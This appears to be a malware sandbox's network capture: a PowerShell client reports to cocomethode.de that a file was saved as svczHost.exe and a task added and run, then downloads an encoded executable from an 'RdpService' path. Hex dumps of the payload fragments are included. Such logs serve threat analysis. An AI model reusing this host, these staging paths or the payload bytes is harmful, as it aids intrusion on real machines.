2024-12-11 11:58:58 UTC	1369	IN	Data Raw: 49 8c 0c 45 e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2c d6 25 01 49 8c 04 47 e7 4f 01 49 8c 0c 36 e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 11 d6 25 01 49 8c 04 38 e7 4f 01 49 8c 0c 2b e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f2 d7 25 01 49 8c 04 2d e7 4f 01 49 8c 0c 1c e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 d7 d7 25 01 49 8c 04 1e e7 4f 01 49 8c 0c 11 e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 b8 d7 25 01 49 8c 04 13 e7 4f 01 49 8c 0c 02 e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 9d d7 25 01 49 8c 04 2c e7 4f 01 49 8c 0c 1f e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 7e d7 25 01 49 8c 04 21 e7 4f 01 49 8c 0c 10 e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 63 d7 25 01 49 8c 04 5a e7 4f 01 49 8c 0c 4d e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 44 d7 25 01 49 Data Ascii: IEOI8tI,%IGOI6OI8tI%I8OI+OI8tI%I-OIOI8tI%IOIOI8tI%IOIOI8tI%I,OIOI8tI~%I!OIOI8tIc%IZOIMOI8tID%I
2024-12-11 11:58:58 UTC	1369	IN	Data Raw: 01 49 82 38 01 74 00 c2 49 8a d1 e8 db d0 25 01 49 8c 04 92 e9 4f 01 49 8c 0c 85 e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bc d0 25 01 49 8c 04 0f e8 4f 01 49 8c 0c fe e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a1 d0 25 01 49 8c 04 08 e8 4f 01 49 8c 0c fb e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 82 d0 25 01 49 8c 04 05 e8 4f 01 49 8c 0c f4 e9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 d0 25 01 49 8c 04 46 e8 4f 01 49 8c 0c 39 e8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 48 d0 25 01 49 8c 04 83 e8 4f 01 49 8c 0c 72 e8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2d d0 25 01 49 8c 04 8c e8 4f 01 49 8c 0c 7f e8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 0e d0 25 01 49 8c 04 99 e8 4f 01 49 8c 0c 88 e8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f3 d1 25 01 49 8c 04 c2 e8 4f 01 Data Ascii: I8tI%IOIOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tIg%IFOI9OI8tIH%IOIrOI8tI-%IOIOI8tI%IOIOI8tI%IO
2024-12-11 11:58:58 UTC	742	IN	Data Raw: 74 00 c2 49 8a d1 e8 67 cd 25 01 49 8c 04 e6 77 90 01 49 8a 01 49 8c 0c 94 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 cd 25 01 49 8c 04 ce 77 90 01 49 8a 01 49 8c 0c 7c db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 cd 25 01 49 8c 04 c6 77 90 01 49 8a 01 49 8c 0c 64 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 cd 25 01 49 8c 04 b6 77 90 01 49 8a 01 49 8c 0c 54 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 ca 25 01 49 8c 04 a6 77 90 01 49 8a 01 49 8c 0c 3c db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 ca 25 01 49 8c 04 ae 77 90 01 49 8a 01 49 8c 0c 3c db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 ca 25 01 49 8c 04 96 77 90 01 49 8a 01 49 8c 0c 2c db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 ca 25 01 49 8c 04 8e 77 90 01 49 8a 01 49 8c 0c fc db 4f 01 49 82 38 Data Ascii: tIg%IwIIOI8tIG%IwII\|OI8tI'%IwIIdOI8tI%IwIITOI8tI%IwII<OI8tI%IwII<OI8tI%IwII,OI8tI%IwIIOI8
2024-12-11 11:58:58 UTC	1369	IN	Data Raw: e8 87 c8 25 01 49 8c 04 ae 74 90 01 49 8a 01 49 8c 0c 4c db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c8 25 01 49 8c 04 96 74 90 01 49 8a 01 49 8c 0c 34 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c8 25 01 49 8c 04 86 74 90 01 49 8a 01 49 8c 0c 24 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c8 25 01 49 8c 04 76 74 90 01 49 8a 01 49 8c 0c 0c db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c8 25 01 49 8c 04 66 74 90 01 49 8a 01 49 8c 0c f4 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c9 25 01 49 8c 04 4e 74 90 01 49 8a 01 49 8c 0c dc d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c9 25 01 49 8c 04 36 74 90 01 49 8a 01 49 8c 0c c4 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c9 25 01 49 8c 04 26 74 90 01 49 8a 01 49 8c 0c ac d8 4f 01 49 82 38 01 74 00 c2 49 8a Data Ascii: %ItIILOI8tIg%ItII4OI8tIG%ItII$OI8tI'%IvtIIOI8tI%IftIIOI8tI%INtIIOI8tI%I6tIIOI8tI%I&tIIOI8tI
2024-12-11 11:58:58 UTC	1369	IN	Data Raw: 01 74 00 c2 49 8a d1 e8 27 c5 25 01 49 8c 04 d6 73 90 01 49 8a 01 49 8c 0c e4 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c5 25 01 49 8c 04 be 73 90 01 49 8a 01 49 8c 0c cc d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c2 25 01 49 8c 04 a6 73 90 01 49 8a 01 49 8c 0c b4 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c2 25 01 49 8c 04 8e 73 90 01 49 8a 01 49 8c 0c 9c d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c2 25 01 49 8c 04 76 73 90 01 49 8a 01 49 8c 0c 84 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c2 25 01 49 8c 04 5e 73 90 01 49 8a 01 49 8c 0c 6c d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c2 25 01 49 8c 04 46 73 90 01 49 8a 01 49 8c 0c 54 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c2 25 01 49 8c 04 2e 73 90 01 49 8a 01 49 8c 0c 44 d7 4f 01 49 82 Data Ascii: tI'%IsIIOI8tI%IsIIOI8tI%IsIIOI8tI%IsIIOI8tI%IvsIIOI8tI%I^sIIlOI8tIg%IFsIITOI8tIG%I.sIIDOI
2024-12-11 11:58:58 UTC	1369	IN	Data Raw: 44 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bf 25 01 49 8c 04 e6 6e 90 01 49 8a 01 49 8c 0c 3c d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bf 25 01 49 8c 04 ce 6e 90 01 49 8a 01 49 8c 0c 2c d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bf 25 01 49 8c 04 c6 6e 90 01 49 8a 01 49 8c 0c 14 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bf 25 01 49 8c 04 b6 6e 90 01 49 8a 01 49 8c 0c 04 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bf 25 01 49 8c 04 ae 6e 90 01 49 8a 01 49 8c 0c ec d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 bf 25 01 49 8c 04 9e 6e 90 01 49 8a 01 49 8c 0c d4 d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 bf 25 01 49 8c 04 96 6e 90 01 49 8a 01 49 8c 0c bc d4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bc 25 01 49 8c 04 7e 6e 90 01 49 8a 01 49 8c Data Ascii: DOI8tI%InII<OI8tI%InII,OI8tI%InIIOI8tIg%InIIOI8tIG%InIIOI8tI'%InIIOI8tI%InIIOI8tI%I~nII
2024-12-11 11:58:58 UTC	1369	IN	Data Raw: 01 49 8a 01 49 8c 0c 0c d2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b8 25 01 49 8c 04 a6 6f 90 01 49 8a 01 49 8c 0c f4 d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b8 25 01 49 8c 04 a6 6f 90 01 49 8a 01 49 8c 0c e4 d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b8 25 01 49 8c 04 8e 6f 90 01 49 8a 01 49 8c 0c d4 d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b8 25 01 49 8c 04 7e 6f 90 01 49 8a 01 49 8c 0c bc d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b9 25 01 49 8c 04 76 6f 90 01 49 8a 01 49 8c 0c a4 d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b9 25 01 49 8c 04 6e 6f 90 01 49 8a 01 49 8c 0c 8c d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b9 25 01 49 8c 04 56 6f 90 01 49 8a 01 49 8c 0c 74 d3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b9 25 01 49 8c 04 3e 6f Data Ascii: IIOI8tIg%IoIIOI8tIG%IoIIOI8tI'%IoIIOI8tI%I~oIIOI8tI%IvoIIOI8tI%InoIIOI8tI%IVoIItOI8tI%I>o
2024-12-11 11:58:58 UTC	1369	IN	Data Raw: 01 49 8c 04 8e 6a 90 01 49 8a 01 49 8c 0c 74 ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b5 25 01 49 8c 04 76 6a 90 01 49 8a 01 49 8c 0c 6c ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b2 25 01 49 8c 04 5e 6a 90 01 49 8a 01 49 8c 0c 54 ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b2 25 01 49 8c 04 46 6a 90 01 49 8a 01 49 8c 0c 3c ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b2 25 01 49 8c 04 2e 6a 90 01 49 8a 01 49 8c 0c 24 ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b2 25 01 49 8c 04 1e 6a 90 01 49 8a 01 49 8c 0c 0c ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b2 25 01 49 8c 04 06 6a 90 01 49 8a 01 49 8c 0c 1c ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b2 25 01 49 8c 04 ee 6b 90 01 49 8a 01 49 8c 0c 04 ce 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b2 Data Ascii: IjIItOI8tI%IvjIIlOI8tI%I^jIITOI8tI%IFjII<OI8tI%I.jII$OI8tI%IjIIOI8tIg%IjIIOI8tIG%IkIIOI8tI'

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:59:11 UTC	285	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 200
2024-12-11 11:59:11 UTC	200	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
2024-12-11 11:59:11 UTC	1193	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:59:11 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kTo5WFRUluF8X0wJYFofYILdkX1Zn4YhtveT9PUyW74yFei9vBztDc2VOAzypqFOrwW5i16ycUs%2FufiqCbn8FA5%2Bp3Opt5G7j8Zud4g2qFv7S71Ik7Xj9rV7z5kxC%2BnGjtwUgL5rsPAW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=54134&min_rtt=1485&rtt_var=7064&sent=128&recv=115&lost=0&retrans=0&sent_bytes=59584&recv_bytes=48070&delivery_rate=7102702&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054ea10ca61d6a-ATL server-timing: cfL4;desc="?proto=TCP&rtt=51&min_rtt=48&rtt_var=12&sent=14&recv=16&lost=0&retrans=0&sent_bytes=3971&recv_bytes=3563&delivery_rate=1190600000&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=52&min_rtt=47&rtt_var=22&sent=9&recv=11&lost=0&retrans=0&sent_bytes=2399&recv_bytes=1993&delivery_rate=992166666&cwnd=74&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:59:11 UTC	627	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 34 26 6d 69 6e 5f 72 74 74 3d 34 31 26 72 74 74 5f 76 61 72 3d 32 31 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 31 34 30 34 26 72 65 63 76 5f 62 79 74 65 73 3d 31 33 34 38 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 30 30 37 34 33 30 37 36 39 26 63 77 6e 64 3d 32 32 30 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 35 36 26 6d Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=41&rtt_var=21&sent=6&recv=8&lost=0&retrans=0&sent_bytes=1404&recv_bytes=1348&delivery_rate=1007430769&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=56&m

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:59:12 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 97
2024-12-11 11:59:12 UTC	97	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
2024-12-11 11:59:12 UTC	1210	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:59:12 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OgYo8KrbAWHOEM9cMM15pkHtymCNDh6cla1Qxg1%2FMyxiDZpheTVG3D7zMjjB9ujd9OfFvJyiJrLjuTO4WbdJ2aolB6Kbj0UsA9mdVG8w8R1Cul3eUA8G9PgqUB7WJmzYcnG9%2B%2BnQwOjp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=27587&min_rtt=1168&rtt_var=29837&sent=5879&recv=2447&lost=0&retrans=23&sent_bytes=8417803&recv_bytes=30921&delivery_rate=39570863&cwnd=302&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054ea68a607bbe-ATL server-timing: cfL4;desc="?proto=TCP&rtt=50&min_rtt=39&rtt_var=28&sent=5&recv=7&lost=0&retrans=0&sent_bytes=13224&recv_bytes=1256&delivery_rate=1679051282&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113985&min_rtt=113949&rtt_var=24093&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1041&delivery_rate=33582&cwnd=248&unsent_bytes=0&cid=d2d7c9828c29eb0d&ts=594&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:59:15 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 64
2024-12-11 11:59:15 UTC	64	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
2024-12-11 11:59:15 UTC	1213	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:59:15 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8LRZfRP2J0F5cGRNNP2RqSZwd5lIeBYG5yvaQ112CXLMOX30G%2FopoN0iW8KFkv%2FvIOExLR9pJJK%2BnC0RF0nCdR7Q1SNXd%2BSlpJjuA6ellujQ589YtwVCNmRfUCX%2BboPPJ3Y80nMNvU5I"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=53791&min_rtt=1485&rtt_var=4289&sent=136&recv=123&lost=0&retrans=0&sent_bytes=61944&recv_bytes=51247&delivery_rate=7102702&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f054eb8bec944eb-ATL server-timing: cfL4;desc="?proto=TCP&rtt=76&min_rtt=22&rtt_var=34&sent=302&recv=294&lost=0&retrans=0&sent_bytes=8358465&recv_bytes=1191&delivery_rate=2976500000&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113832&min_rtt=113811&rtt_var=24027&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1008&delivery_rate=33642&cwnd=236&unsent_bytes=0&cid=1a78e8236f788402&ts=581&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-12-11 12:00:12 UTC	64	OUT	GET /StaticFile/RdpService/79 HTTP/1.1 Host: cocomethode.de
2024-12-11 12:00:13 UTC	1347	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 12:00:13 GMT Content-Type: application/octet-stream Content-Length: 9429504 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image hash: 5641F3A5B9787F23D3D34F0D9F791B7A CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yfWwINRM5C9U5psuLguqrnjHp6IQIQCdcUTIdVCZ0u%2BL34%2FHEyp%2FUBLOGlsMct85qGDRs4WQ%2F2YaTT4TNPr52ilcP6n2zfaEPAd6GRjw49wI21PpFhQT8WQSFR88TTrk4MESmghcOjR2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=45888&min_rtt=1130&rtt_var=18530&sent=66&recv=71&lost=0&retrans=0&sent_bytes=21023&recv_bytes=33451&delivery_rate=2504288&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05501e69558bba-ATL server-timing: cfL4;desc="?proto=TCP&rtt=46&min_rtt=46&rtt_var=23&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=46&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113900&min_rtt=113863&rtt_var=24083&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=702&delivery_rate=33584&cwnd=252&unsent_bytes=0&cid=0f46eac6420e4ab8&ts=899&x=0"
2024-12-11 12:00:13 UTC	22	IN	Data Raw: 02 15 df 4f 4c 4f 4f 4f 4b 4f 4f 4f b0 b0 4f 4f f7 4f 4f 4f 4f 4f Data Ascii: OLOOOKOOOOOOOOOO
2024-12-11 12:00:13 UTC	1369	IN	Data Raw: 4f 4f 0f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4e 4f 4f 41 50 f5 41 4f fb 46 82 6e f7 4e 03 82 6e 1b 27 26 3c 6f 3f 3d 20 28 3d 2e 22 6f 2c 2e 21 21 20 3b 6f 2d 2a 6f 3d 3a 21 6f 26 21 6f 0b 00 1c 6f 22 20 2b 2a 61 42 42 45 6b 4f 4f 4f 4f 4f 4f 4f a1 a2 79 6f e5 c3 17 3c e5 c3 17 3c e5 c3 17 3c ec bb 84 3c eb c3 17 3c 95 42 16 3d f2 c3 17 3c e5 c3 16 3c 63 c2 17 3c f5 47 14 3d f6 c3 17 3c f5 47 13 3d dc c3 17 3c ad 46 12 3d e6 c3 17 3c 95 42 13 3d e7 c3 17 3c e5 c3 17 3c e4 c3 17 3c f5 47 12 3d 93 c3 17 3c ad 46 17 3d e4 c3 17 3c ad 46 15 3d e4 c3 17 3c 1d 26 2c 27 e5 c3 17 3c 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 1f 0a 4f 4f 2b c9 47 4f 80 41 17 28 4f 4f 4f 4f 4f 4f 4f 4f bf Data Ascii: OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOONOOAPAOFnNn'&<o?= (=."o,.!! ;o-o=:!o&!oo" +aBBEkOOOOOOOyo<<<<<B=<<c<G=<G=<F=<B=<<<G=<F=<F=<&,'<OOOOOOOOOOOOOOOOOO+GOA(OOOOOOOO
2024-12-11 12:00:13 UTC	1369	IN	Data Raw: 4e 8c 07 c4 9f a6 68 96 67 4f 07 c2 4a f7 c0 17 4f 07 c2 42 e6 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 96 67 4f 07 c2 4a e4 c0 17 4f 07 c2 42 d3 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a2 97 67 4f 07 c2 4a d1 c0 17 4f 07 c2 42 c0 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 9f 97 67 4f 07 c2 4a f6 c0 17 4f 07 c2 42 e5 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 fc 97 67 4f 07 c2 4a f3 c0 17 4f 07 c2 42 e2 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 d9 97 67 4f 07 c2 4a f8 c0 17 4f 07 c2 42 e7 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 36 97 67 4f 07 c2 4a e5 c0 17 4f 07 c2 42 d4 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 13 97 67 4f 07 c2 4a e2 c0 17 4f 07 c2 42 d1 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 70 97 67 4f 07 c2 4a ef c0 17 4f 07 c2 42 de c0 17 Data Ascii: NhgOJOBOvO:NEgOJOBOvO:NgOJOBOvO:NgOJOBOvO:NgOJOBOvO:NgOJOBOvO:N6gOJOBOvO:NgOJOBOvO:NpgOJOB
2024-12-11 12:00:13 UTC	1369	IN	Data Raw: 9b 9c 67 4f 07 c2 4a 8a de 17 4f 07 c2 42 f9 de 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 f8 9c 67 4f 07 c2 4a 9f de 17 4f 07 c2 42 8e de 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 d5 9c 67 4f 07 c2 4a 94 de 17 4f 07 c2 42 83 de 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 32 9c 67 4f 07 c2 4a 91 de 17 4f 07 c2 42 80 de 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 2f 9c 67 4f 07 c2 4a a6 de 17 4f 07 c2 42 95 de 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 0c 9c 67 4f 07 c2 4a 43 dd 17 4f 07 c2 42 b2 de 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 69 9c 67 4f 07 c2 4a 78 dd 17 4f 07 c2 42 67 dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 46 9c 67 4f 07 c2 4a 1d dd 17 4f 07 c2 42 0c dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a3 9d 67 4f 07 c2 4a 02 dd 17 4f 07 c2 42 71 dd 17 4f 07 cc 76 4f 3a Data Ascii: gOJOBOvO:NgOJOBOvO:NgOJOBOvO:N2gOJOBOvO:N/gOJOBOvO:NgOJCOBOvO:NigOJxOBgOvO:NFgOJOBOvO:NgOJOBqOvO:
2024-12-11 12:00:13 UTC	741	IN	Data Raw: 4a cd da 17 4f 07 c2 42 3c da 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 2b 81 67 4f 07 c2 4a f2 ee 17 4f 07 c2 42 e1 ee 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 08 81 67 4f 07 c2 4a c7 ed 17 4f 07 c2 42 36 ed 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 81 67 4f 07 c2 4a 34 40 e9 4f 07 c4 4f 07 c2 42 1e cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 82 67 4f 07 c2 4a 24 40 e9 4f 07 c4 4f 07 c2 42 76 cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 82 67 4f 07 c2 4a 1c 40 e9 4f 07 c4 4f 07 c2 42 6e cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 82 67 4f 07 c2 4a 0c 40 e9 4f 07 c4 4f 07 c2 42 46 cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 82 67 4f 07 c2 4a 1c 40 e9 4f 07 c4 4f 07 c2 42 46 cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 82 67 4f 07 c2 4a 3c 40 e9 4f 07 c4 4f Data Ascii: 